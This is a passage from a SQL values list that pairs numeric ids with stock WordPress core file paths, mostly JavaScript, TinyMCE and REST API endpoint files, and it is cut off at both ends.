js'),(7132,'wp-includes/js/autosave.min.js'),(7133,'wp-includes/js/backbone.js'),(7134,'wp-includes/js/backbone.min.js'),(7135,'wp-includes/js/clipboard.js'),(7136,'wp-includes/js/clipboard.min.js'),(7137,'wp-includes/js/codemirror/codemirror.min.css'),(7138,'wp-includes/js/codemirror/codemirror.min.js'),(7139,'wp-includes/js/codemirror/csslint.js'),(7140,'wp-includes/js/codemirror/esprima.js'),(7141,'wp-includes/js/codemirror/fakejshint.js'),(7142,'wp-includes/js/codemirror/htmlhint-kses.js'),(7143,'wp-includes/js/codemirror/htmlhint.js'),(7144,'wp-includes/js/codemirror/jsonlint.js'),(7145,'wp-includes/js/colorpicker.js'),(7146,'wp-includes/js/colorpicker.min.js'),(7147,'wp-includes/js/comment-reply.js'),(7148,'wp-includes/js/comment-reply.min.js'),(7149,'wp-includes/js/crop/cropper.css'),(7150,'wp-includes/js/crop/cropper.js'),(7151,'wp-includes/js/crop/marqueeHoriz.gif'),(7152,'wp-includes/js/crop/marqueeVert.gif'),(7153,'wp-includes/js/customize-base.js'),(7154,'wp-includes/js/customize-base.min.js'),(7155,'wp-includes/js/customize-loader.js'),(7156,'wp-includes/js/customize-loader.min.js'),(7157,'wp-includes/js/customize-models.js'),(7158,'wp-includes/js/customize-models.min.js'),(7159,'wp-includes/js/customize-preview-nav-menus.js'),(7160,'wp-includes/js/customize-preview-nav-menus.min.js'),(7161,'wp-includes/js/customize-preview-widgets.js'),(7162,'wp-includes/js/customize-preview-widgets.min.js'),(7163,'wp-includes/js/customize-preview.js'),(7164,'wp-includes/js/customize-preview.min.js'),(7165,'wp-includes/js/customize-selective-refresh.js'),(7166,'wp-includes/js/customize-selective-refresh.min.js'),(7167,'wp-includes/js/customize-views.js'),(7168,'wp-includes/js/customize-views.min.js'),(7169,'wp-includes/js/dist/a11y.js'),(7170,'wp-includes/js/dist/a11y.min.js'),(7171,'wp-includes/js/dist/annotations.js'),(7172,'wp-includes/js/dist/annotations.min.js'),(7173,'wp-includes/js/dist/api-fetch.js'),(7174,'wp-includes/js/dist/api-fetch.min.js'),(7175,'wp-includes/js/dist/autop.js'),(7176,'wp-includes/js/dist/autop.min.js'),(7177,'wp-includes/js/dist/blob.js'),(7178,'wp-includes/js/dist/blob.min.js'),(7179,'wp-includes/js/dist/block-directory.js'),(7180,'wp-includes/js/dist/block-directory.min.js'),(7181,'wp-includes/js/dist/block-editor.js'),(7182,'wp-includes/js/dist/block-editor.min.js'),(7183,'wp-includes/js/dist/block-library.js'),(7184,'wp-includes/js/dist/block-library.min.js'),(7185,'wp-includes/js/dist/block-serialization-default-parser.js'),(7186,'wp-includes/js/dist/block-serialization-default-parser.min.js'),(7187,'wp-includes/js/dist/blocks.js'),(7188,'wp-includes/js/dist/blocks.min.js'),(7189,'wp-includes/js/dist/components.js'),(7190,'wp-includes/js/dist/components.min.js'),(7191,'wp-includes/js/dist/compose.js'),(7192,'wp-includes/js/dist/compose.min.js'),(7193,'wp-includes/js/dist/core-data.js'),(7194,'wp-includes/js/dist/core-data.min.js'),(7195,'wp-includes/js/dist/data-controls.js'),(7196,'wp-includes/js/dist/data-controls.min.js'),(7197,'wp-includes/js/dist/data.js'),(7198,'wp-includes/js/dist/data.min.js'),(7199,'wp-includes/js/dist/date.js'),(7200,'wp-includes/js/dist/date.min.js'),(7201,'wp-includes/js/dist/deprecated.js'),(7202,'wp-includes/js/dist/deprecated.min.js'),(7203,'wp-includes/js/dist/dom-ready.js'),(7204,'wp-includes/js/dist/dom-ready.min.js'),(7205,'wp-includes/js/dist/dom.js'),(7206,'wp-includes/js/dist/dom.min.js'),(7207,'wp-includes/js/dist/edit-post.js'),(7208,'wp-includes/js/dist/edit-post.min.js'),(7209,'wp-includes/js/dist/editor.js'),(7210,'wp-includes/js/dist/editor.min.js'),(7211,'wp-includes/js/dist/element.js'),(7212,'wp-includes/js/dist/element.min.js'),(7213,'wp-includes/js/dist/escape-html.js'),(7214,'wp-includes/js/dist/escape-html.min.js'),(7215,'wp-includes/js/dist/format-library.js'),(7216,'wp-includes/js/dist/format-library.min.js'),(7217,'wp-includes/js/dist/hooks.js'),(7218,'wp-includes/js/dist/hooks.min.js'),(7219,'wp-includes/js/dist/html-entities.js'),(7220,'wp-includes/js/dist/html-entities.min.js'),(7221,'wp-includes/js/dist/i18n.js'),(7222,'wp-includes/js/dist/i18n.min.js'),(7223,'wp-includes/js/dist/is-shallow-equal.js'),(7224,'wp-includes/js/dist/is-shallow-equal.min.js'),(7225,'wp-includes/js/dist/keyboard-shortcuts.js'),(7226,'wp-includes/js/dist/keyboard-shortcuts.min.js'),(7227,'wp-includes/js/dist/keycodes.js'),(7228,'wp-includes/js/dist/keycodes.min.js'),(7229,'wp-includes/js/dist/list-reusable-blocks.js'),(7230,'wp-includes/js/dist/list-reusable-blocks.min.js'),(7231,'wp-includes/js/dist/media-utils.js'),(7232,'wp-includes/js/dist/media-utils.min.js'),(7233,'wp-includes/js/dist/notices.js'),(7234,'wp-includes/js/dist/notices.min.js'),(7235,'wp-includes/js/dist/nux.js'),(7236,'wp-includes/js/dist/nux.min.js'),(7237,'wp-includes/js/dist/plugins.js'),(7238,'wp-includes/js/dist/plugins.min.js'),(7239,'wp-includes/js/dist/primitives.js'),(7240,'wp-includes/js/dist/primitives.min.js'),(7241,'wp-includes/js/dist/priority-queue.js'),(7242,'wp-includes/js/dist/priority-queue.min.js'),(7243,'wp-includes/js/dist/redux-routine.js'),(7244,'wp-includes/js/dist/redux-routine.min.js'),(7245,'wp-includes/js/dist/reusable-blocks.js'),(7246,'wp-includes/js/dist/reusable-blocks.min.js'),(7247,'wp-includes/js/dist/rich-text.js'),(7248,'wp-includes/js/dist/rich-text.min.js'),(7249,'wp-includes/js/dist/server-side-render.js'),(7250,'wp-includes/js/dist/server-side-render.min.js'),(7251,'wp-includes/js/dist/shortcode.js'),(7252,'wp-includes/js/dist/shortcode.min.js'),(7253,'wp-includes/js/dist/token-list.js'),(7254,'wp-includes/js/dist/token-list.min.js'),(7255,'wp-includes/js/dist/url.js'),(7256,'wp-includes/js/dist/url.min.js'),(7257,'wp-includes/js/dist/vendor/lodash.js'),(7258,'wp-includes/js/dist/vendor/lodash.min.js'),(7259,'wp-includes/js/dist/vendor/moment.js'),(7260,'wp-includes/js/dist/vendor/moment.min.js'),(7261,'wp-includes/js/dist/vendor/react-dom.js'),(7262,'wp-includes/js/dist/vendor/react-dom.min.js'),(7263,'wp-includes/js/dist/vendor/react.js'),(7264,'wp-includes/js/dist/vendor/react.min.js'),(7265,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),(7266,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),(7267,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),(7268,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),(7269,'wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),(7270,'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),(7271,'wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),(7272,'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),(7273,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),(7274,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),(7275,'wp-includes/js/dist/vendor/wp-polyfill-object-fit.js'),(7276,'wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js'),(7277,'wp-includes/js/dist/vendor/wp-polyfill-url.js'),(7278,'wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),(7279,'wp-includes/js/dist/vendor/wp-polyfill.js'),(7280,'wp-includes/js/dist/vendor/wp-polyfill.min.js'),(7281,'wp-includes/js/dist/viewport.js'),(7282,'wp-includes/js/dist/viewport.min.js'),(7283,'wp-includes/js/dist/warning.js'),(7284,'wp-includes/js/dist/warning.min.js'),(7285,'wp-includes/js/dist/wordcount.js'),(7286,'wp-includes/js/dist/wordcount.min.js'),(7287,'wp-includes/js/heartbeat.js'),(7288,'wp-includes/js/heartbeat.min.js'),(7289,'wp-includes/js/hoverIntent.js'),(7290,'wp-includes/js/hoverIntent.min.js'),(7291,'wp-includes/js/hoverintent-js.min.js'),(7292,'wp-includes/js/imagesloaded.min.js'),(7293,'wp-includes/js/imgareaselect/border-anim-h.gif'),(7294,'wp-includes/js/imgareaselect/border-anim-v.gif'),(7295,'wp-includes/js/imgareaselect/imgareaselect.css'),(7296,'wp-includes/js/imgareaselect/jquery.imgareaselect.js'),(7297,'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),(7298,'wp-includes/js/jcrop/Jcrop.gif'),(7299,'wp-includes/js/jcrop/jquery.Jcrop.min.css'),(7300,'wp-includes/js/jcrop/jquery.Jcrop.min.js'),(7301,'wp-includes/js/jquery/jquery-migrate.js'),(7302,'wp-includes/js/jquery/jquery-migrate.min.js'),(7303,'wp-includes/js/jquery/jquery.color.min.js'),(7304,'wp-includes/js/jquery/jquery.form.js'),(7305,'wp-includes/js/jquery/jquery.form.min.js'),(7306,'wp-includes/js/jquery/jquery.hotkeys.js'),(7307,'wp-includes/js/jquery/jquery.hotkeys.min.js'),(7308,'wp-includes/js/jquery/jquery.js'),(7309,'wp-includes/js/jquery/jquery.masonry.min.js'),(7310,'wp-includes/js/jquery/jquery.min.js'),(7311,'wp-includes/js/jquery/jquery.query.js'),(7312,'wp-includes/js/jquery/jquery.schedule.js'),(7313,'wp-includes/js/jquery/jquery.serialize-object.js'),(7314,'wp-includes/js/jquery/jquery.table-hotkeys.js'),(7315,'wp-includes/js/jquery/jquery.table-hotkeys.min.js'),(7316,'wp-includes/js/jquery/jquery.ui.touch-punch.js'),(7317,'wp-includes/js/jquery/suggest.js'),(7318,'wp-includes/js/jquery/suggest.min.js'),(7319,'wp-includes/js/jquery/ui/accordion.js'),(7320,'wp-includes/js/jquery/ui/accordion.min.js'),(7321,'wp-includes/js/jquery/ui/autocomplete.js'),(7322,'wp-includes/js/jquery/ui/autocomplete.min.js'),(7323,'wp-includes/js/jquery/ui/button.js'),(7324,'wp-includes/js/jquery/ui/button.min.js'),(7325,'wp-includes/js/jquery/ui/checkboxradio.js'),(7326,'wp-includes/js/jquery/ui/checkboxradio.min.js'),(7327,'wp-includes/js/jquery/ui/controlgroup.js'),(7328,'wp-includes/js/jquery/ui/controlgroup.min.js'),(7329,'wp-includes/js/jquery/ui/core.js'),(7330,'wp-includes/js/jquery/ui/core.min.js'),(7331,'wp-includes/js/jquery/ui/datepicker.js'),(7332,'wp-includes/js/jquery/ui/datepicker.min.js'),(7333,'wp-includes/js/jquery/ui/dialog.js'),(7334,'wp-includes/js/jquery/ui/dialog.min.js'),(7335,'wp-includes/js/jquery/ui/draggable.js'),(7336,'wp-includes/js/jquery/ui/draggable.min.js'),(7337,'wp-includes/js/jquery/ui/droppable.js'),(7338,'wp-includes/js/jquery/ui/droppable.min.js'),(7339,'wp-includes/js/jquery/ui/effect-blind.js'),(7340,'wp-includes/js/jquery/ui/effect-blind.min.js'),(7341,'wp-includes/js/jquery/ui/effect-bounce.js'),(7342,'wp-includes/js/jquery/ui/effect-bounce.min.js'),(7343,'wp-includes/js/jquery/ui/effect-clip.js'),(7344,'wp-includes/js/jquery/ui/effect-clip.min.js'),(7345,'wp-includes/js/jquery/ui/effect-drop.js'),(7346,'wp-includes/js/jquery/ui/effect-drop.min.js'),(7347,'wp-includes/js/jquery/ui/effect-explode.js'),(7348,'wp-includes/js/jquery/ui/effect-explode.min.js'),(7349,'wp-includes/js/jquery/ui/effect-fade.js'),(7350,'wp-includes/js/jquery/ui/effect-fade.min.js'),(7351,'wp-includes/js/jquery/ui/effect-fold.js'),(7352,'wp-includes/js/jquery/ui/effect-fold.min.js'),(7353,'wp-includes/js/jquery/ui/effect-highlight.js'),(7354,'wp-includes/js/jquery/ui/effect-highlight.min.js'),(7355,'wp-includes/js/jquery/ui/effect-puff.js'),(7356,'wp-includes/js/jquery/ui/effect-puff.min.js'),(7357,'wp-includes/js/jquery/ui/effect-pulsate.js'),(7358,'wp-includes/js/jquery/ui/effect-pulsate.min.js'),(7359,'wp-includes/js/jquery/ui/effect-scale.js'),(7360,'wp-includes/js/jquery/ui/effect-scale.min.js'),(7361,'wp-includes/js/jquery/ui/effect-shake.js'),(7362,'wp-includes/js/jquery/ui/effect-shake.min.js'),(7363,'wp-includes/js/jquery/ui/effect-size.js'),(7364,'wp-includes/js/jquery/ui/effect-size.min.js'),(7365,'wp-includes/js/jquery/ui/effect-slide.js'),(7366,'wp-includes/js/jquery/ui/effect-slide.min.js'),(7367,'wp-includes/js/jquery/ui/effect-transfer.js'),(7368,'wp-includes/js/jquery/ui/effect-transfer.min.js'),(7369,'wp-includes/js/jquery/ui/effect.js'),(7370,'wp-includes/js/jquery/ui/effect.min.js'),(7371,'wp-includes/js/jquery/ui/menu.js'),(7372,'wp-includes/js/jquery/ui/menu.min.js'),(7373,'wp-includes/js/jquery/ui/mouse.js'),(7374,'wp-includes/js/jquery/ui/mouse.min.js'),(7375,'wp-includes/js/jquery/ui/progressbar.js'),(7376,'wp-includes/js/jquery/ui/progressbar.min.js'),(7377,'wp-includes/js/jquery/ui/resizable.js'),(7378,'wp-includes/js/jquery/ui/resizable.min.js'),(7379,'wp-includes/js/jquery/ui/selectable.js'),(7380,'wp-includes/js/jquery/ui/selectable.min.js'),(7381,'wp-includes/js/jquery/ui/selectmenu.js'),(7382,'wp-includes/js/jquery/ui/selectmenu.min.js'),(7383,'wp-includes/js/jquery/ui/slider.js'),(7384,'wp-includes/js/jquery/ui/slider.min.js'),(7385,'wp-includes/js/jquery/ui/sortable.js'),(7386,'wp-includes/js/jquery/ui/sortable.min.js'),(7387,'wp-includes/js/jquery/ui/spinner.js'),(7388,'wp-includes/js/jquery/ui/spinner.min.js'),(7389,'wp-includes/js/jquery/ui/tabs.js'),(7390,'wp-includes/js/jquery/ui/tabs.min.js'),(7391,'wp-includes/js/jquery/ui/tooltip.js'),(7392,'wp-includes/js/jquery/ui/tooltip.min.js'),(7393,'wp-includes/js/json2.js'),(7394,'wp-includes/js/json2.min.js'),(7395,'wp-includes/js/masonry.min.js'),(7396,'wp-includes/js/mce-view.js'),(7397,'wp-includes/js/mce-view.min.js'),(7398,'wp-includes/js/media-audiovideo.js'),(7399,'wp-includes/js/media-audiovideo.min.js'),(7400,'wp-includes/js/media-editor.js'),(7401,'wp-includes/js/media-editor.min.js'),(7402,'wp-includes/js/media-grid.js'),(7403,'wp-includes/js/media-grid.min.js'),(7404,'wp-includes/js/media-models.js'),(7405,'wp-includes/js/media-models.min.js'),(7406,'wp-includes/js/media-views.js'),(7407,'wp-includes/js/media-views.min.js'),(7408,'wp-includes/js/mediaelement/mediaelement-and-player.js'),(7409,'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(7410,'wp-includes/js/mediaelement/mediaelement-migrate.js'),(7411,'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(7412,'wp-includes/js/mediaelement/mediaelement.js'),(7413,'wp-includes/js/mediaelement/mediaelement.min.js'),(7414,'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(7415,'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(7416,'wp-includes/js/mediaelement/mediaelementplayer.css'),(7417,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(7418,'wp-includes/js/mediaelement/mejs-controls.png'),(7419,'wp-includes/js/mediaelement/mejs-controls.svg'),(7420,'wp-includes/js/mediaelement/renderers/vimeo.js'),(7421,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(7422,'wp-includes/js/mediaelement/wp-mediaelement.css'),(7423,'wp-includes/js/mediaelement/wp-mediaelement.js'),(7424,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(7425,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(7426,'wp-includes/js/mediaelement/wp-playlist.js'),(7427,'wp-includes/js/mediaelement/wp-playlist.min.js'),(7428,'wp-includes/js/plupload/handlers.js'),(7429,'wp-includes/js/plupload/handlers.min.js'),(7430,'wp-includes/js/plupload/license.txt'),(7431,'wp-includes/js/plupload/moxie.js'),(7432,'wp-includes/js/plupload/moxie.min.js'),(7433,'wp-includes/js/plupload/plupload.js'),(7434,'wp-includes/js/plupload/plupload.min.js'),(7435,'wp-includes/js/plupload/wp-plupload.js'),(7436,'wp-includes/js/plupload/wp-plupload.min.js'),(7437,'wp-includes/js/quicktags.js'),(7438,'wp-includes/js/quicktags.min.js'),(7439,'wp-includes/js/shortcode.js'),(7440,'wp-includes/js/shortcode.min.js'),(7441,'wp-includes/js/swfobject.js'),(7442,'wp-includes/js/swfupload/handlers.js'),(7443,'wp-includes/js/swfupload/handlers.min.js'),(7444,'wp-includes/js/swfupload/license.txt'),(7445,'wp-includes/js/swfupload/swfupload.js'),(7446,'wp-includes/js/thickbox/loadingAnimation.gif'),(7447,'wp-includes/js/thickbox/macFFBgHack.png'),(7448,'wp-includes/js/thickbox/thickbox.css'),(7449,'wp-includes/js/thickbox/thickbox.js'),(7450,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(7451,'wp-includes/js/tinymce/license.txt'),(7452,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(7453,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(7454,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(7455,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(7456,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(7457,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(7458,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(7459,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(7460,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(7461,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(7462,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(7463,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(7464,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(7465,'wp-includes/js/tinymce/plugins/image/plugin.js'),(7466,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(7467,'wp-includes/js/tinymce/plugins/link/plugin.js'),(7468,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(7469,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(7470,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(7471,'wp-includes/js/tinymce/plugins/media/plugin.js'),(7472,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(7473,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(7474,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(7475,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(7476,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(7477,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(7478,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(7479,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(7480,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(7481,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(7482,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(7483,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(7484,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(7485,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(7486,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(7487,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(7488,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(7489,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(7490,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(7491,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(7492,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(7493,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(7494,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(7495,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(7496,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(7497,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(7498,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(7499,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(7500,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(7501,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(7502,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(7503,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(7504,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(7505,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(7506,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(7507,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(7508,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(7509,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(7510,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(7511,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(7512,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(7513,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(7514,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(7515,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(7516,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(7517,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(7518,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(7519,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(7520,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(7521,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(7522,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(7523,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(7524,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(7525,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(7526,'wp-includes/js/tinymce/themes/inlite/theme.js'),(7527,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(7528,'wp-includes/js/tinymce/themes/modern/theme.js'),(7529,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(7530,'wp-includes/js/tinymce/tiny_mce_popup.js'),(7531,'wp-includes/js/tinymce/tinymce.min.js'),(7532,'wp-includes/js/tinymce/utils/editable_selects.js'),(7533,'wp-includes/js/tinymce/utils/form_utils.js'),(7534,'wp-includes/js/tinymce/utils/mctabs.js'),(7535,'wp-includes/js/tinymce/utils/validate.js'),(7536,'wp-includes/js/tinymce/wp-tinymce.js'),(7537,'wp-includes/js/tinymce/wp-tinymce.php'),(7538,'wp-includes/js/tw-sack.js'),(7539,'wp-includes/js/tw-sack.min.js'),(7540,'wp-includes/js/twemoji.js'),(7541,'wp-includes/js/twemoji.min.js'),(7542,'wp-includes/js/underscore.js'),(7543,'wp-includes/js/underscore.min.js'),(7544,'wp-includes/js/utils.js'),(7545,'wp-includes/js/utils.min.js'),(7546,'wp-includes/js/wp-ajax-response.js'),(7547,'wp-includes/js/wp-ajax-response.min.js'),(7548,'wp-includes/js/wp-api.js'),(7549,'wp-includes/js/wp-api.min.js'),(7550,'wp-includes/js/wp-auth-check.js'),(7551,'wp-includes/js/wp-auth-check.min.js'),(7552,'wp-includes/js/wp-backbone.js'),(7553,'wp-includes/js/wp-backbone.min.js'),(7554,'wp-includes/js/wp-custom-header.js'),(7555,'wp-includes/js/wp-custom-header.min.js'),(7556,'wp-includes/js/wp-embed-template.js'),(7557,'wp-includes/js/wp-embed-template.min.js'),(7558,'wp-includes/js/wp-embed.js'),(7559,'wp-includes/js/wp-embed.min.js'),(7560,'wp-includes/js/wp-emoji-loader.js'),(7561,'wp-includes/js/wp-emoji-loader.min.js'),(7562,'wp-includes/js/wp-emoji-release.min.js'),(7563,'wp-includes/js/wp-emoji.js'),(7564,'wp-includes/js/wp-emoji.min.js'),(7565,'wp-includes/js/wp-list-revisions.js'),(7566,'wp-includes/js/wp-list-revisions.min.js'),(7567,'wp-includes/js/wp-lists.js'),(7568,'wp-includes/js/wp-lists.min.js'),(7569,'wp-includes/js/wp-pointer.js'),(7570,'wp-includes/js/wp-pointer.min.js'),(7571,'wp-includes/js/wp-sanitize.js'),(7572,'wp-includes/js/wp-sanitize.min.js'),(7573,'wp-includes/js/wp-util.js'),(7574,'wp-includes/js/wp-util.min.js'),(7575,'wp-includes/js/wpdialog.js'),(7576,'wp-includes/js/wpdialog.min.js'),(7577,'wp-includes/js/wplink.js'),(7578,'wp-includes/js/wplink.min.js'),(7579,'wp-includes/js/zxcvbn-async.js'),(7580,'wp-includes/js/zxcvbn-async.min.js'),(7581,'wp-includes/js/zxcvbn.min.js'),(7582,'wp-includes/kses.php'),(7583,'wp-includes/l10n.php'),(7584,'wp-includes/link-template.php'),(7585,'wp-includes/load.php'),(7586,'wp-includes/locale.php'),(7587,'wp-includes/media-template.php'),(7588,'wp-includes/media.php'),(7589,'wp-includes/meta.php'),(7590,'wp-includes/ms-blogs.php'),(7591,'wp-includes/ms-default-constants.php'),(7592,'wp-includes/ms-default-filters.php'),(7593,'wp-includes/ms-deprecated.php'),(7594,'wp-includes/ms-files.php'),(7595,'wp-includes/ms-functions.php'),(7596,'wp-includes/ms-load.php'),(7597,'wp-includes/ms-network.php'),(7598,'wp-includes/ms-settings.php'),(7599,'wp-includes/ms-site.php'),(7600,'wp-includes/nav-menu-template.php'),(7601,'wp-includes/nav-menu.php'),(7602,'wp-includes/option.php'),(7603,'wp-includes/pluggable-deprecated.php'),(7604,'wp-includes/pluggable.php'),(7605,'wp-includes/plugin.php'),(7606,'wp-includes/pomo/entry.php'),(7607,'wp-includes/pomo/mo.php'),(7608,'wp-includes/pomo/plural-forms.php'),(7609,'wp-includes/pomo/po.php'),(7610,'wp-includes/pomo/pomo/entry.php'),(7611,'wp-includes/pomo/pomo/mo.php'),(7612,'wp-includes/pomo/pomo/plural-forms.php'),(7613,'wp-includes/pomo/pomo/po.php'),(7614,'wp-includes/pomo/pomo/streams.php'),(7615,'wp-includes/pomo/pomo/translations.php'),(7616,'wp-includes/pomo/streams.php'),(7617,'wp-includes/pomo/translations.php'),(7618,'wp-includes/post-formats.php'),(7619,'wp-includes/post-template.php'),(7620,'wp-includes/post-thumbnail-template.php'),(7621,'wp-includes/post.php'),(7622,'wp-includes/query.php'),(7623,'wp-includes/random_compat/byte_safe_strings.php'),(7624,'wp-includes/random_compat/cast_to_int.php'),(7625,'wp-includes/random_compat/error_polyfill.php'),(7626,'wp-includes/random_compat/random.php'),(7627,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(7628,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(7629,'wp-includes/random_compat/random_bytes_libsodium.php'),(7630,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(7631,'wp-includes/random_compat/random_bytes_mcrypt.php'),(7632,'wp-includes/random_compat/random_int.php'),(7633,'wp-includes/registration-functions.php'),(7634,'wp-includes/registration.php'),(7635,'wp-includes/rest-api/class-wp-rest-request.php'),(7636,'wp-includes/rest-api/class-wp-rest-response.php'),(7637,'wp-includes/rest-api/class-wp-rest-server.php'),(7638,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(7639,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(7640,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(7641,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(7642,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(7643,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(7644,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(7645,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(7646,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(7647,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(7648,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(7649,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(7650,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(7651,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(7652,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(7653,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(7654,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(7655,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(7656,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(7657,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(7658,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(7659,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(7660,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(7661,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(7662,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(7663,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(7664,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(7665,'wp-includes/re